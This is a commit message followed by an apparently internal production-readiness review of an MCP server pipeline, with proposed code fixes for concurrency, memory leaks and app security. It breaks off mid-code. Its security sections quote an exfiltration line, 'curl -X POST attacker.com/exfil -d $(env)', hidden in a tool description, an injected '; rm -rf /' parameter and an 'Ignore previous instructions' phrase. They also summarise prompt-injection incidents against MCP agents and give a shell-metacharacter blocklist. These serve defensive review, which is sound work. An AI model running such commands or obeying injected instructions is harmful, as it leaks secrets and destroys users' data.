Jake Shore f3c4cd817b Add all MCP servers + factory infra to MCPEngine — 2026-02-06
=== NEW SERVERS ADDED (7) ===
- servers/closebot — 119 tools, 14 modules, 4,656 lines TS (Stage 7)
- servers/google-console — Google Search Console MCP (Stage 7)
- servers/meta-ads — Meta/Facebook Ads MCP (Stage 8)
- servers/twilio — Twilio communications MCP (Stage 8)
- servers/competitor-research — Competitive intel MCP (Stage 6)
- servers/n8n-apps — n8n workflow MCP apps (Stage 6)
- servers/reonomy — Commercial real estate MCP (Stage 1)

=== FACTORY INFRASTRUCTURE ADDED ===
- infra/factory-tools — mcp-jest, mcp-validator, mcp-add, MCP Inspector
  - 60 test configs, 702 auto-generated test cases
  - All 30 servers score 100/100 protocol compliance
- infra/command-center — Pipeline state, operator playbook, dashboard config
- infra/factory-reviews — Automated eval reports

=== DOCS ADDED ===
- docs/MCP-FACTORY.md — Factory overview
- docs/reports/ — 5 pipeline evaluation reports
- docs/research/ — Browser MCP research

=== RULES ESTABLISHED ===
- CONTRIBUTING.md — All MCP work MUST go in this repo
- README.md — Full inventory of 37 servers + infra docs
- .gitignore — Updated for Python venvs

TOTAL: 37 MCP servers + full factory pipeline in one repo.
This is now the single source of truth for all MCP work.


Boss Mei — Final Review & Improvement Proposals

Reviewer: Director Mei — Enterprise Production & Scale Systems Authority
Date: 2026-02-04
Scope: Full MCP Factory pipeline (6 skills) — production readiness assessment
Verdict: NOT READY FOR PRODUCTION AT A BANK — but with targeted fixes, it could be ready within 2-3 weeks


Pass 1 Notes (Per Skill — Production Readiness Assessment)

1. MCP-FACTORY.md (Pipeline Orchestrator)

What's good:

  • Clear 6-phase pipeline with defined inputs/outputs per phase
  • Quality gates at every stage — this is production-grade thinking
  • Agent parallelization (Phases 2 & 3 concurrent) is correct
  • Inventory tracking (30 untested servers) shows awareness of tech debt

What concerns me:

  • No rollback strategy at the pipeline level. If Phase 4 fails, there's no automated way to undo Phases 2-3 artifacts. Each server build is fire-and-forget.
  • No versioning scheme for servers. When you have 30+ servers, you need to know which version of the analysis doc produced which server build. There's no traceability.
  • No dependency management between servers. What happens when two servers share the same API (e.g., GHL CRM tools used across multiple channels)? No guidance on deduplication.
  • Estimated times are optimistic. "30-60 minutes" for a large API analysis — in practice, complex OAuth APIs (Salesforce, HubSpot) take 3-4 hours with their quirky auth flows.
  • Missing: capacity planning. 30+ servers all running as stdio processes means 30+ Node.js processes. On a Mac Mini with 8/16GB RAM, that's a problem.

Production readiness: 7/10 — solid architecture, needs operational depth.


2. mcp-api-analyzer (Phase 1)

What's good:

  • API style detection (REST/GraphQL/SOAP/gRPC/WebSocket) is comprehensive
  • Pagination pattern catalog is excellent — covers all 8 common patterns
  • Tool description formula (6-part with "When NOT to use") is research-backed
  • Elicitation candidates section shows protocol-awareness
  • Content annotations planning (audience + priority) is forward-thinking
  • Token budget awareness with specific targets (<5,000 tokens per server)

What concerns me:

  • No rate limit testing strategy. The analyzer documents rate limits but doesn't recommend actually testing them before production. A sandbox environment should be mandatory.
  • OAuth2 device code flow not covered. Many IoT and headless APIs use device_code grant — relevant for MCP servers running headlessly.
  • Version deprecation section is thin. "Check for sunset timelines" is not enough. Need a specific cadence for re-checking API versions (quarterly minimum).
  • Missing: webhook/event-driven patterns. The doc says "note but don't deep-dive" on webhooks. For production, many tools NEED webhook support for real-time data (e.g., CRM deal updates, payment notifications).
  • Missing: API sandbox/test environment detection. The analyzer should flag whether the API has a sandbox, because this directly affects how QA can be done.
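
For reference, the device_code grant (RFC 8628) the analyzer should cover is short: request a device code, show the operator a verification URL, then poll the token endpoint until the grant completes. A sketch with an injected transport so it stays testable headlessly — the `Post` type and endpoint URLs are illustrative, not from any specific API:

```typescript
// OAuth2 device_code grant (RFC 8628), sketched with an injected transport.
// The grant_type URN and response fields follow the RFC.
interface DeviceAuth {
  device_code: string;
  user_code: string;
  verification_uri: string;
  interval: number; // polling interval in seconds
}
type Post = (url: string, form: Record<string, string>) => Promise<Record<string, unknown>>;

async function deviceCodeFlow(
  post: Post,
  clientId: string,
  authUrl: string,
  tokenUrl: string,
): Promise<string> {
  const auth = (await post(authUrl, { client_id: clientId })) as unknown as DeviceAuth;
  // Operator completes verification at auth.verification_uri using auth.user_code.
  for (;;) {
    const res = await post(tokenUrl, {
      client_id: clientId,
      device_code: auth.device_code,
      grant_type: "urn:ietf:params:oauth:grant-type:device_code",
    });
    if (typeof res.access_token === "string") return res.access_token;
    // "authorization_pending" and "slow_down" mean keep polling; anything else is fatal.
    if (res.error !== "authorization_pending" && res.error !== "slow_down") {
      throw new Error(`device flow failed: ${String(res.error)}`);
    }
    await new Promise((r) => setTimeout(r, auth.interval * 1000));
  }
}
```

This is the grant headless MCP servers would use when no browser redirect is possible; the analyzer should flag APIs that support it.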

Production readiness: 8/10 — strongest skill, minor gaps.


3. mcp-server-builder (Phase 2)

What's good:

  • Circuit breaker pattern is implemented correctly
  • Request timeouts via AbortController — essential, many builders miss this
  • Structured logging on stderr (JSON format with request IDs) — production-grade
  • Pluggable pagination strategies — well-architected
  • Dual transport (stdio + Streamable HTTP) with env var selection
  • Health check tool always included — excellent operational practice
  • Error classification (protocol vs tool execution) follows spec correctly
  • Token budget targets are realistic (<200 tokens/tool, <5,000 total)

What concerns me (CRITICAL):

  1. Circuit breaker has a race condition. The half-open state allows ONE request through, but if multiple tool calls arrive simultaneously (common in multi-turn conversations), they ALL pass through before the circuit records success/failure. This can overwhelm a recovering API.

  2. No jitter on retry delays. RETRY_BASE_DELAY * Math.pow(2, attempt) creates thundering herd — all retrying clients hit the API at exactly the same time. Must add random jitter.

  3. Memory leak risk in HTTP transport session management. sessions Map grows unboundedly. Dead sessions (client disconnected) are only removed on explicit DELETE. In production, network interruptions mean many sessions will never be cleaned up. This WILL cause OOM over time.

  4. Rate limit tracking is per-client-instance, not per-API-key. If you have multiple MCP server instances behind a load balancer sharing the same API key, each instance tracks its own rate limit counters independently. They'll collectively exceed the limit.

  5. Unsafe any casts in paginate(). The pagination code contains multiple as any casts — if the API response shape changes, these silently pass and produce runtime errors downstream.

  6. No request deduplication. If the LLM calls the same tool twice simultaneously (happens with parallel tool calling), two identical API requests fire. For GET it's wasteful, for POST it can create duplicates.

  7. OAuth2 token refresh has no mutex. In the client_credentials pattern, if the token expires and 5 requests arrive simultaneously, all 5 will attempt to refresh the token. Need a lock/semaphore.

  8. AbortController timeout in the finally block is correct, but the timeout callback still fires after the controller is garbage-collected in some Node.js versions. Should explicitly call controller.abort() in the clearTimeout path for safety.
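
Concern 6 maps to a small in-flight request cache: concurrent calls with the same key share one promise instead of firing duplicate API requests. A minimal sketch, not taken from the builder template (the class name and key scheme are illustrative):

```typescript
// Deduplicate identical in-flight requests: concurrent callers with the
// same key await one shared promise; the entry is removed when it settles,
// so a later call with the same key executes fresh.
class RequestDeduplicator {
  private inFlight = new Map<string, Promise<unknown>>();

  run<T>(key: string, fn: () => Promise<T>): Promise<T> {
    const existing = this.inFlight.get(key);
    if (existing) return existing as Promise<T>;
    const p = fn().finally(() => this.inFlight.delete(key));
    this.inFlight.set(key, p);
    return p;
  }
}
```

A reasonable key is HTTP method + URL + a hash of the body. Apply this only to idempotent requests (GETs, or POSTs carrying an idempotency key), since collapsing a genuinely intended double-submit would be wrong.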

Production readiness: 6/10 — good foundation, but the concurrency bugs and memory leak are production-killers.


4. mcp-app-designer (Phase 3)

What's good:

  • Design system is comprehensive (color palette, typography, spacing tokens)
  • WCAG AA compliance is explicitly called out with contrast ratios
  • 9 app type templates covering common patterns
  • Three-state rendering (loading/empty/data) is mandatory
  • Error boundary with window.onerror — essential for iframe stability
  • Bidirectional communication (sendToHost) enables app→host interaction
  • Accessibility: sr-only, focus management, prefers-reduced-motion
  • Interactive Data Grid with sort, filter, expand, bulk select — feature-rich

What concerns me:

  1. escapeHtml() relies on DOM-based escaping. document.createElement('div').textContent = text is safe in browsers, but if anyone ever renders this server-side (SSR), it won't work. This approach also creates a DOM element per escape call — at scale (1000 rows), that's 6000+ DOM element creations.

  2. Polling fallback has no circuit breaker. If /api/app-data is down, the app retries 20 times with increasing delays. That's up to 20 failed requests per app per session. With 30+ apps, that's 600 failed requests hammering a broken endpoint.

  3. postMessage has NO origin validation. The template accepts messages from ANY origin (*). In production, this means any page that can embed the iframe (or any browser extension) can inject arbitrary data into the app. This is a known security vulnerability pattern.

  4. setInterval(pollForData, 3000) in the old reference — though the newer template uses exponential backoff, verify all existing apps use the new pattern. Fixed-interval polling at 3s is a DoS vector.

  5. The Interactive Data Grid's handleSearch has a double-sort bug. When search and sort are both active, handleSort is called twice, toggling the direction back. The comment says "toggle it back", but the net effect is a UX bug.

  6. Missing: Content Security Policy. No CSP meta tag in the template. Single-file HTML apps with inline scripts need script-src 'unsafe-inline', but should at least restrict form actions, frame ancestors, and connect-src.

  7. Missing: iframe sandboxing guidance. The apps run in iframes but there's no guidance on the sandbox attribute the host should apply.

Production readiness: 7/10 — solid design system, security gaps need immediate attention.


5. mcp-localbosses-integrator (Phase 4)

What's good:

  • Complete file-by-file checklist (5 files to update)
  • System prompt engineering guidelines are excellent (structured, budgeted, with few-shot examples)
  • APP_DATA failure mode catalog with parser pattern — very production-aware
  • Thread state management with localStorage limits documented
  • Rollback strategies (git, feature-flag, manifest-based) — good operational thinking
  • Integration validation script that cross-references all 4 files — catches orphaned entries
  • Intake question quality criteria with good/bad examples
  • Token budget targets for prompts (<500 channel, <300 addon)

What concerns me:

  1. APP_DATA parsing is fragile by design. The entire data flow depends on the LLM generating valid JSON inside a comment block. Research shows LLMs produce malformed JSON 5-15% of the time. The fallback parser helps, but this is an architectural fragility — you're trusting probabilistic output for deterministic rendering.

  2. No schema validation on APP_DATA before sending to app. The parser extracts JSON, but nothing validates it matches what the app expects. A valid JSON object with wrong field names silently produces broken apps.

  3. Thread cleanup relies on client-side code. The cleanupOldThreads function is recommended but not enforced. Without it, localStorage grows indefinitely. At 5MB, you hit QuotaExceededError and threads start silently failing.

  4. System prompt injection risk. The system prompt includes user-facing instructions like "TOOL SELECTION RULES." If an attacker puts "Ignore previous instructions" in a chat message, the LLM might comply because the system prompt wasn't hardened against injection. Need system prompt hardening techniques.

  5. No rate limiting on thread creation. A user (or bot) can create unlimited threads, each consuming localStorage and server-side context. No guard against abuse.

  6. Validation script uses regex to parse TypeScript. This is inherently fragile — template strings, multi-line expressions, and comments can all cause false positives/negatives. AST-based parsing (ts-morph or TypeScript compiler API) would be more reliable.

  7. Missing: canary deployment guidance. The feature-flag strategy is described but there's no guidance on gradually rolling out a channel to a subset of users before full deployment.
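
Concern 2 can be closed with a validation step between the APP_DATA parser and the postMessage to the app. The builder already uses Zod for tool inputs, and zod's safeParse would be the natural fit here; the dependency-free sketch below shows the shape of the check. The title/items fields are hypothetical, not the real app contract:

```typescript
// Validate parsed APP_DATA against the shape the app expects before posting
// it to the iframe, so valid-JSON-but-wrong-shape payloads are caught at the
// boundary instead of silently rendering a broken app.
interface AppData {
  title: string;
  items: Array<{ id: string; label: string }>;
}

function validateAppData(raw: unknown): { ok: true; data: AppData } | { ok: false; error: string } {
  if (typeof raw !== "object" || raw === null) return { ok: false, error: "APP_DATA is not an object" };
  const obj = raw as Record<string, unknown>;
  if (typeof obj.title !== "string") return { ok: false, error: "missing string field: title" };
  if (!Array.isArray(obj.items)) return { ok: false, error: "missing array field: items" };
  const items = obj.items as unknown[];
  for (let i = 0; i < items.length; i++) {
    const it = items[i] as Record<string, unknown> | null;
    if (typeof it?.id !== "string" || typeof it?.label !== "string") {
      return { ok: false, error: `items[${i}] must have string id and label` };
    }
  }
  return { ok: true, data: obj as unknown as AppData };
}
```

On failure, the integrator can fall back to the app's error state with the validation message, rather than handing the app malformed data.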

Production readiness: 7/10 — operationally aware, but the APP_DATA architectural fragility is a long-term concern.


6. mcp-qa-tester (Phase 5)

What's good:

  • 6-layer testing architecture with quantitative metrics — extremely thorough
  • MCP protocol compliance testing (Layer 0) using MCP Inspector + custom JSON-RPC client
  • structuredContent schema validation against outputSchema
  • Playwright visual testing + BackstopJS regression
  • axe-core accessibility automation with score thresholds
  • Performance benchmarks (cold start, latency, memory, file size)
  • Chaos testing (API 500s, wrong formats, huge datasets, rapid-fire messages)
  • Security testing (XSS payloads, postMessage origin, key exposure)
  • Comprehensive test data fixtures library (edge cases, adversarial, unicode, scale)
  • Automated QA shell script with persistent reporting
  • Regression baselines and trending

What concerns me:

  1. Layer 4 (live API testing) is the weakest link. The credential management strategy is documented but manual. With 30+ servers, manually managing .env files is error-prone. Need a secrets manager (Vault, AWS Secrets Manager, or at minimum encrypted at rest).

  2. No test isolation. Jest tests with MSW are good, but there's no guidance on ensuring tests don't interfere with each other. If one test modifies MSW handlers and doesn't clean up, subsequent tests get unexpected behavior.

  3. MCP protocol test client is too simple. MCP over stdio is newline-delimited JSON-RPC, but the MCPTestClient assumes each stdout read yields exactly one complete message — in practice a read can return a partial line, or several messages in one chunk. Need proper message framing with line buffering.

  4. No load/stress testing. Performance testing covers cold start and single-request latency, but not concurrent load. What happens when 10 users hit the same MCP server simultaneously over HTTP? No guidance.

  5. Tool routing tests are framework-only, not actual LLM tests. The routing fixtures validate that the expected tools exist, but don't actually test that the LLM selects the right tool. This is the MOST IMPORTANT test for production, yet it requires the LLM in the loop — there's no harness for that.

  6. Missing: smoke test for deployment. After deploying to production, need a post-deployment smoke test that validates the server is reachable, tools respond, and at least one app renders. The QA script assumes a development environment.

  7. BackstopJS baseline management at scale. With 30+ servers × 5+ apps × 3 viewports = 450+ screenshots. That's a lot of baselines to maintain. Need guidance on selective regression (only re-test changed servers).

Production readiness: 8/10 — most comprehensive testing framework I've seen for MCP, but needs LLM-in-the-loop testing and load testing.


Pass 2 Notes (Operational Gaps, Race Conditions, Security Issues)

Can a team operate 30+ servers built with these skills?

Short answer: Not without additional operational infrastructure.

Gaps:

  1. No centralized health dashboard. Each server has a health_check tool, but nothing aggregates health across all 30+ servers. An operator can't answer "which servers are healthy right now?" without calling each one individually.

  2. No alerting integration. The structured logging is good, but there's no guidance on connecting it to PagerDuty, Slack alerts, or any alerting system. In production, you need to know when circuit breakers trip within minutes, not hours.

  3. No centralized log aggregation. Each server logs to stderr. With 30+ servers, that's 30+ separate log streams. Need guidance on piping to a centralized system (stdout → journald → Loki/Datadog/CloudWatch).

  4. No deployment automation. Building a server is documented, deploying it is not. There's no Dockerfile, docker-compose, systemd service file, or PM2 ecosystem file. Each server is assumed to run manually.

  5. No dependency update strategy. 30+ servers × package.json = 30+ sets of npm dependencies. When MCP SDK ships a breaking change, who updates all 30? Need a monorepo or automated dependency update workflow.

Incident Response

What happens when an API goes down at 3 AM?

The circuit breaker opens (good), the health_check shows "unhealthy" (good), but:

  • Nobody is alerted
  • No runbook exists for "API is down"
  • No guidance on whether to restart the server, wait, or disable the channel
  • No SLA expectations documented per API

What happens when a tool returns wrong data?

  • The LLM generates APP_DATA based on wrong data
  • The app renders it — user sees incorrect information
  • No data validation layer between tool output and LLM consumption
  • No "data looks suspicious" detection

Race Conditions Identified

  1. Circuit breaker half-open concurrent requests (described in Pass 1) — CRITICAL
  2. OAuth token refresh thundering herd — CRITICAL
  3. localStorage thread cleanup vs active write — if cleanup runs while a thread is being created, the new thread may be deleted immediately
  4. Rapid postMessage updates — the template handles this via deduplication (JSON.stringify comparison), but this comparison is O(n) on data size and blocks the UI thread for large datasets
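
Race 3 has a cheap structural fix: give cleanup a grace period so it never evicts a thread that was active in the last few minutes. A sketch of the eviction-selection logic, kept storage-agnostic for clarity (the names and the 5-minute grace value are illustrative):

```typescript
// Age-based thread eviction with a grace period: over-quota threads are
// evicted oldest-first, but anything touched within graceMs is protected,
// so cleanup cannot race a thread that is mid-write.
interface ThreadMeta {
  id: string;
  lastActivity: number; // epoch ms
}

function threadsToEvict(
  threads: ThreadMeta[],
  maxThreads: number,
  now: number,
  graceMs = 5 * 60_000,
): string[] {
  if (threads.length <= maxThreads) return [];
  return [...threads]
    .sort((a, b) => a.lastActivity - b.lastActivity) // oldest first
    .slice(0, threads.length - maxThreads)           // over-quota candidates
    .filter((t) => now - t.lastActivity > graceMs)   // grace-period guard
    .map((t) => t.id);
}
```

Note the trade-off: if all over-quota candidates are recent, nothing is evicted and the quota is briefly exceeded — the grace period deliberately wins over the limit.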

Memory Leak Risks

  1. HTTP session Map — unbounded growth, no TTL, no max size — CRITICAL
  2. Polling timers in apps — if clearTimeout(pollTimer) fails (e.g., render throws before clearing), orphaned timers accumulate
  3. AbortController in retry loops — each retry creates a new AbortController. If a request hangs past the timeout but doesn't complete, the old controller stays in memory
  4. Logger request IDs — no concern, short-lived strings
  5. Tool registry lazy loading — tools load once, handlers reference client — no leak here

Security Posture Assessment

Adequate for internal tools? Yes, mostly.
Adequate for production at a bank? NO.

Critical gaps:

  1. No input sanitization between LLM output and tool parameters. The LLM generates tool arguments, Zod validates the schema, but doesn't sanitize for injection. A prompt-injected LLM could pass ; rm -rf / as a parameter if the tool eventually shells out.
  2. No postMessage origin validation in app template — any page can inject data
  3. No CSP in app template — inline scripts are unconstrained
  4. API keys stored in plain .env files — no encryption at rest
  5. No audit logging — tool calls are logged but not in a tamper-proof audit trail
  6. No rate limiting on tool calls — a compromised LLM could invoke destructive tools in a tight loop
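
For gap 1, a guard between Zod schema validation and any tool that eventually shells out is cheap to add. A hedged sketch — the metacharacter blocklist is illustrative, and a per-parameter allowlist is strictly stronger:

```typescript
// Reject parameter values containing shell metacharacters before a tool
// ever passes them toward a subprocess. A blocklist like this catches the
// obvious injection payloads from a prompt-injected LLM; an allowlist of
// expected characters per parameter is the stronger posture.
const SHELL_META = /[;&|`$<>\\\n]/;

function assertSafeParam(name: string, value: string): void {
  if (SHELL_META.test(value)) {
    throw new Error(`Parameter "${name}" contains shell metacharacters and was rejected`);
  }
}
```

The real fix is to never interpolate tool parameters into a shell string at all (use execFile with an argument array), but this guard is a sensible defense-in-depth layer regardless.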

Research Findings (Production Patterns and Incidents)

Real-World MCP Security Incidents (2025-2026)

  1. Supabase MCP "Lethal Trifecta" Attack (mid-2025): Cursor agent running with privileged service-role access processed support tickets containing hidden SQL injection. Attacker exfiltrated integration tokens through a public thread. Root cause: privileged access + untrusted input + external communication channel.

  2. Asana MCP Data Exposure (June 2025): Customer data leaked between MCP instances due to a bug. Asana published a post-mortem. Lesson: multi-tenant MCP deployments need strict data isolation.

  3. 492 Exposed MCP Servers (2025): Trend Micro found 492 MCP servers publicly exposed with no authentication. Many had command-execution flaws. Lesson: MCP servers MUST NOT be internet-accessible without authentication.

  4. mcp-remote Command Injection: Vulnerability in the mcp-remote package allowed command injection. Lesson: MCP ecosystem supply chain is immature — audit dependencies.

  5. Tool Description Injection (ongoing): Researchers demonstrated that malicious tool descriptions can inject hidden prompts. The weather_lookup example: hiding curl -X POST attacker.com/exfil -d $(env) in a tool description. Lesson: tool descriptions are an attack vector.

Production Architecture Patterns (2025-2026)

  1. MCP Gateway Pattern (Microsoft, IBM, Envoy): A reverse proxy that fronts multiple MCP servers behind one endpoint. Adds session-aware routing, centralized auth, policy enforcement, observability. Microsoft's mcp-gateway is Kubernetes-native. IBM's ContextForge federates MCP + REST + A2A. Envoy AI Gateway provides MCP proxy with multiplexed streams.

  2. Container-Per-Server (ToolHive, Docker): Each MCP server runs in its own container. ToolHive by Stacklok provides container lifecycle management with zero-config observability. Docker's blog recommends using Docker as the MCP server gateway. Key insight: containers provide process isolation + resource limits that stdio doesn't.

  3. Sidecar Observability (ToolHive): Rather than modifying each MCP server, a sidecar proxy intercepts MCP traffic and emits OpenTelemetry spans. Zero server modification. This is the recommended approach for retrofitting observability onto existing servers.

Observability Best Practices

From Zeo's analysis of 16,400+ MCP server implementations:

  • 73% of production outages start at the transport/protocol layer — yet it's the most overlooked
  • Agents fail 20-30% of the time without recovery — human oversight is essential
  • Method-not-found errors (-32601) above 0.5% indicate tool hallucination — a critical reliability signal
  • JSON-RPC parse errors (-32700) spikes correlate with buggy clients or scanning attempts
  • Three-layer monitoring model: Transport → Tool Execution → Task Completion
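
The -32601 threshold above is easy to enforce mechanically. A sketch of a simple rate check over a counter window — reset the counters each scrape interval; the 0.5% threshold and 200-sample floor follow the figures above, with the floor being an illustrative guard against noisy small samples:

```typescript
// Count JSON-RPC outcomes and alert when method-not-found (-32601) exceeds
// 0.5% of requests in the current window — the tool-hallucination signal.
class ErrorRateMonitor {
  private total = 0;
  private methodNotFound = 0;

  record(errorCode?: number): void {
    this.total++;
    if (errorCode === -32601) this.methodNotFound++;
  }

  shouldAlert(threshold = 0.005, minSamples = 200): boolean {
    return this.total >= minSamples && this.methodNotFound / this.total > threshold;
  }

  reset(): void {
    this.total = 0;
    this.methodNotFound = 0;
  }
}
```
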

Proposed Improvements (Specific, Actionable, With Corrected Code)

CRITICAL: Fix Circuit Breaker Race Condition

Problem: Half-open state allows unlimited concurrent requests.
Fix: Add a mutex/semaphore so only ONE request passes through in half-open state.

class CircuitBreaker {
  private state: CircuitState = "closed";
  private failureCount = 0;
  private lastFailureTime = 0;
  private halfOpenLock = false; // ADD THIS
  private readonly failureThreshold: number;
  private readonly resetTimeoutMs: number;

  constructor(failureThreshold = 5, resetTimeoutMs = 60_000) {
    this.failureThreshold = failureThreshold;
    this.resetTimeoutMs = resetTimeoutMs;
  }

  canExecute(): boolean {
    if (this.state === "closed") return true;
    if (this.state === "open") {
      if (Date.now() - this.lastFailureTime >= this.resetTimeoutMs) {
        // Only allow ONE request through in half-open
        if (!this.halfOpenLock) {
          this.halfOpenLock = true;
          this.state = "half-open";
          logger.info("circuit_breaker.half_open");
          return true;
        }
        return false; // Another request already testing
      }
      return false;
    }
    // half-open: already locked, reject additional requests
    return false;
  }

  recordSuccess(): void {
    this.halfOpenLock = false;
    if (this.state !== "closed") {
      logger.info("circuit_breaker.closed", { previousFailures: this.failureCount });
    }
    this.failureCount = 0;
    this.state = "closed";
  }

  recordFailure(): void {
    this.halfOpenLock = false;
    this.failureCount++;
    this.lastFailureTime = Date.now();
    if (this.failureCount >= this.failureThreshold || this.state === "half-open") {
      this.state = "open";
      logger.warn("circuit_breaker.open", {
        failureCount: this.failureCount,
        resetAfterMs: this.resetTimeoutMs,
      });
    }
  }
}

CRITICAL: Add Jitter to Retry Delays

Problem: Exponential backoff without jitter causes thundering herd.
Fix:

// BEFORE (bad):
await this.delay(RETRY_BASE_DELAY * Math.pow(2, attempt));

// AFTER (correct):
const baseDelay = RETRY_BASE_DELAY * Math.pow(2, attempt);
const jitter = Math.random() * baseDelay * 0.5; // 0-50% jitter
await this.delay(baseDelay + jitter);

CRITICAL: Fix HTTP Session Memory Leak

Problem: Sessions Map grows without bound.
Fix: Add TTL-based cleanup and max session limit.

// In startHttpTransport():
const sessions = new Map<string, { transport: StreamableHTTPServerTransport; lastActivity: number }>();
const MAX_SESSIONS = 100;
const SESSION_TTL_MS = 30 * 60 * 1000; // 30 minutes

// Session cleanup interval
const cleanupInterval = setInterval(() => {
  const now = Date.now();
  for (const [id, session] of sessions.entries()) {
    if (now - session.lastActivity > SESSION_TTL_MS) {
      logger.info("session.expired", { sessionId: id });
      sessions.delete(id);
    }
  }
}, 60_000); // Check every minute

// Limit max sessions
function getOrCreateSession(sessionId?: string): StreamableHTTPServerTransport {
  if (sessionId && sessions.has(sessionId)) {
    const session = sessions.get(sessionId)!;
    session.lastActivity = Date.now();
    return session.transport;
  }
  if (sessions.size >= MAX_SESSIONS) {
    // Evict oldest session
    let oldest: string | null = null;
    let oldestTime = Infinity;
    for (const [id, s] of sessions.entries()) {
      if (s.lastActivity < oldestTime) {
        oldestTime = s.lastActivity;
        oldest = id;
      }
    }
    if (oldest) sessions.delete(oldest);
  }
  // Create new session...
}

// Clean up on server shutdown
process.on('SIGTERM', () => {
  clearInterval(cleanupInterval);
  sessions.clear();
});

CRITICAL: Add OAuth Token Refresh Mutex

Problem: Concurrent requests all try to refresh expired token simultaneously.
Fix:

export class APIClient {
  private accessToken: string | null = null;
  private tokenExpiry: number = 0;
  private refreshPromise: Promise<string> | null = null; // ADD THIS

  private async getAccessToken(): Promise<string> {
    // Return cached token if valid (5 min buffer)
    if (this.accessToken && Date.now() < this.tokenExpiry - 300_000) {
      return this.accessToken;
    }

    // If already refreshing, wait for that to complete
    if (this.refreshPromise) {
      return this.refreshPromise;
    }

    // Start a new refresh and let all concurrent callers share it
    this.refreshPromise = this._doRefresh();
    try {
      const token = await this.refreshPromise;
      return token;
    } finally {
      this.refreshPromise = null;
    }
  }

  private async _doRefresh(): Promise<string> {
    // ... actual token refresh logic ...
  }
}

HIGH: Add postMessage Origin Validation to App Template

// In the message event listener:
window.addEventListener('message', (event) => {
  // Validate origin — only accept from our host
  const allowedOrigins = [
    window.location.origin,
    'http://localhost:3000',
    'http://192.168.0.25:3000',
    // Add production origin
  ];
  
  // In production, be strict. In development, accept any.
  const isDev = window.location.hostname === 'localhost' || window.location.hostname === '127.0.0.1';
  if (!isDev && !allowedOrigins.includes(event.origin)) {
    console.warn('[App] Rejected postMessage from untrusted origin:', event.origin);
    return;
  }

  try {
    const msg = event.data;
    // ... existing handler logic ...
  } catch (e) {
    console.error('postMessage handler error:', e);
  }
});

HIGH: Add CSP Meta Tag to App Template

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <!-- Content Security Policy -->
  <meta http-equiv="Content-Security-Policy" 
    content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: blob:; connect-src 'self'; form-action 'none'; frame-ancestors 'self';">
  <title>{App Name}</title>

HIGH: Replace DOM-Based escapeHtml with String-Based

// BEFORE (creates DOM elements — slow at scale):
function escapeHtml(text) {
  if (!text) return '';
  const div = document.createElement('div');
  div.textContent = String(text);
  return div.innerHTML;
}

// AFTER (string replacement — 10x faster, SSR-safe):
function escapeHtml(text) {
  if (!text) return '';
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

HIGH: Add Centralized Health Dashboard Tool

Add to MCP-FACTORY.md — a meta-server that aggregates health:

// health-aggregator.ts — runs as a separate process
// Calls health_check on every registered MCP server
// Exposes a dashboard endpoint

interface ServerHealth {
  name: string;
  status: 'healthy' | 'degraded' | 'unhealthy' | 'unreachable';
  lastChecked: string;
  latencyMs: number;
  error?: string;
}

async function checkAllServers(): Promise<ServerHealth[]> {
  const servers = loadServerRegistry(); // Read from config
  return Promise.all(servers.map(async (server) => {
    const start = Date.now();
    try {
      const result = await callMCPTool(server.command, 'health_check', {});
      return { name: server.name, ...JSON.parse(result), lastChecked: new Date().toISOString(), latencyMs: Date.now() - start };
    } catch (e) {
      return { name: server.name, status: 'unreachable', lastChecked: new Date().toISOString(), latencyMs: -1, error: String(e) };
    }
  }));
}

MEDIUM: Add Dockerfile Template to Server Builder

# {service}-mcp/Dockerfile
FROM node:22-alpine AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --include=dev
COPY . .
RUN npm run build

FROM node:22-alpine
WORKDIR /app
COPY --from=builder /app/dist ./dist
COPY --from=builder /app/node_modules ./node_modules
COPY --from=builder /app/package.json ./

# Non-root user
RUN addgroup -g 1001 mcp && adduser -u 1001 -G mcp -s /bin/sh -D mcp
USER mcp

# Health check
HEALTHCHECK --interval=30s --timeout=10s --start-period=5s \
  CMD node -e "fetch('http://localhost:3000/health').then(r => process.exit(r.ok ? 0 : 1)).catch(() => process.exit(1))"

# Default to HTTP transport in containers
ENV MCP_TRANSPORT=http
ENV MCP_HTTP_PORT=3000
EXPOSE 3000

CMD ["node", "dist/index.js"]

MEDIUM: Add Interactive Data Grid Search Double-Sort Fix

// BEFORE (buggy — double toggles sort direction):
function handleSearch(query) {
  gridState.searchQuery = query.toLowerCase().trim();
  // ... filtering logic ...
  if (gridState.sortCol) {
    handleSort(gridState.sortCol);
    gridState.sortDir = gridState.sortDir === 'asc' ? 'desc' : 'asc';
    handleSort(gridState.sortCol);
  } else {
    renderRows();
  }
}

// AFTER (correct — apply sort without toggling):
function handleSearch(query) {
  gridState.searchQuery = query.toLowerCase().trim();
  if (!gridState.searchQuery) {
    gridState.filteredItems = [...gridState.items];
  } else {
    gridState.filteredItems = gridState.items.filter(item =>
      Object.values(item).some(v =>
        v != null && String(v).toLowerCase().includes(gridState.searchQuery)
      )
    );
  }
  // Re-apply current sort WITHOUT toggling direction
  if (gridState.sortCol) {
    applySortToFiltered(); // New function that sorts without toggling
  }
  renderRows();
}

function applySortToFiltered() {
  const colKey = gridState.sortCol;
  if (!colKey) return;
  gridState.filteredItems.sort((a, b) => {
    let aVal = a[colKey], bVal = b[colKey];
    if (aVal == null) return 1;
    if (bVal == null) return -1;
    if (typeof aVal === 'number' && typeof bVal === 'number') {
      return gridState.sortDir === 'asc' ? aVal - bVal : bVal - aVal;
    }
    aVal = String(aVal).toLowerCase();
    bVal = String(bVal).toLowerCase();
    const cmp = aVal.localeCompare(bVal);
    return gridState.sortDir === 'asc' ? cmp : -cmp;
  });
}

MEDIUM: Add LLM-in-the-Loop Tool Routing Test Harness

Add to QA tester skill:

```typescript
// tests/llm-routing.test.ts
// This test REQUIRES an LLM endpoint (Claude API or local proxy)

const LLM_ENDPOINT = process.env.LLM_TEST_ENDPOINT || 'http://localhost:3001/v1/chat/completions';

interface RoutingTestCase {
  message: string;
  expectedTool: string;
  systemPrompt: string; // from channel config
}

async function testToolRouting(testCase: RoutingTestCase): Promise<{
  correct: boolean;
  selectedTool: string | null;
  latencyMs: number;
}> {
  const start = performance.now();

  const response = await fetch(LLM_ENDPOINT, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      model: 'claude-sonnet-4-20250514',
      messages: [
